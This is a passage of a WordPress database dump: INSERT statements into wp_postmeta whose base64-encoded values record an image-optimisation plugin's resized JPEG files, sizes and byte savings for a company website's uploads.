FwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01FZGljYWwtMS0xLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMzkzLCJpZCI6ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01FZGljYWwtMS0xLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTAzOTUsImlkIjo4NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01FZGljYWwtMS0xLTQwMHgzMjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTEtNDAweDMyMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjMyMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMS00MDB4MzIwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDM5NywiaWQiOjg1fV0='); 
INSERT INTO `wp_postmeta` VALUES (30363, 82, 'wpfc_optimisation_reduction', '414557'); 
INSERT INTO `wp_postmeta` VALUES (30364, 82, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZ2Fza2V0LTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9nYXNrZXQtMS5qcGciLCJ3aWR0aCI6NjAxNiwiaGVpZ2h0Ijo0MDE2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZ2Fza2V0LTEuanBnIiwicmVkdWN0aW9uIjo0MTQ1NDMsInRpbWUiOjE0ODM1OTA0MTAsImlkIjoiODIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2dhc2tldC0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZ2Fza2V0LTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9nYXNrZXQtMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDQxMiwiaWQiOjgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2dhc2tldC0xLTgwMHg1MzQuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZ2Fza2V0LTEtODAweDUzNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9nYXNrZXQtMS04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDQxNiwiaWQiOjgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2dhc2tldC0xLTc2OHg1MTMuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZ2Fza2V0LTEtNzY4eDUxMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9nYXNrZXQtMS03Njh4NTEzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDQyMCwiaWQiOjgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2dhc2tldC0xLTE2MDB4MTA2OC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2dhc2tldC0xLTE2MDB4MTA2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9nYXNrZXQtMS0xNjAweDEwNjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNDI0LCJpZCI6ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZ2Fza2V0LTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9nYXNrZXQtMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2dhc2tldC0xLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNDI3LCJpZCI6ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZ2Fza2V0LTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9nYXNrZXQtMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2dhc2tldC0xLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNDMwLCJpZCI6ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZ2Fza2V0LTEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9nYXNrZXQtMS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2dhc2tldC0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNDMzLCJpZCI6ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZ2Fza2V0LTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9nYXNrZXQtMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2dhc2tldC0xLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNDM2LCJpZCI6ODJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9nYXNrZXQtMS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2dhc2tldC0xLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZ2Fza2V0LTEtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA0MzksImlkIjo4Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2dhc2tldC0xLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZ2Fza2V0LTEtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9nYXNrZXQtMS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDQ0MiwiaWQiOjgyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZ2Fza2V0LTEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9nYXNrZXQtMS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2dhc2tldC0xLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNDQ1LCJpZCI6ODJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9nYXNrZXQtMS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2dhc2tldC0xLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZ2Fza2V0LTEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA0NDcsImlkIjo4Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2dhc2tldC0xLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZ2Fza2V0LTEtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9nYXNrZXQtMS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDQ1MSwiaWQiOjgyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZ2Fza2V0LTEtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9nYXNrZXQtMS02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2dhc2tldC0xLTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNDU0LCJpZCI6ODJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30365, 81, 'wpfc_optimisation_reduction', '16737'); 
INSERT INTO `wp_postmeta` VALUES (30366, 81, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS5qcGciLCJ3aWR0aCI6NTQ4MSwiaGVpZ2h0IjozMzk2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTkwNDU5LCJpZCI6IjgxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc0NywidGltZSI6MTQ4MzU5MDQ2MiwiaWQiOjgxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTgwMHg0OTYuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo0OTYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEtODAweDQ5Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS04MDB4NDk2LmpwZyIsInJlZHVjdGlvbiI6MTY0MywidGltZSI6MTQ4MzU5MDQ2NiwiaWQiOjgxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTc2OHg0NzYuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0NzYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEtNzY4eDQ3Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS03Njh4NDc2LmpwZyIsInJlZHVjdGlvbiI6MTYzOSwidGltZSI6MTQ4MzU5MDQ3MCwiaWQiOjgxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTE2MDB4OTkxLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjk5MSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS0xNjAweDk5MS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS0xNjAweDk5MS5qcGciLCJyZWR1Y3Rpb24iOjU1MjIsInRpbWUiOjE0ODM1OTA0NzQsImlkIjo4MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUzNCwidGltZSI6MTQ4MzU5MDQ3OCwiaWQiOjgxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDM2LCJ0aW1lIjoxNDgzNTkwNDgxLCJpZCI6ODF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MTYsInRpbWUiOjE0ODM1OTA0ODQsImlkIjo4MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEyMzgsInRpbWUiOjE0ODM1OTA0ODgsImlkIjo4MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDIxLCJ0aW1lIjoxNDgzNTkwNDkxLCJpZCI6ODF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQ5OCwidGltZSI6MTQ4MzU5MDQ5NSwiaWQiOjgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWls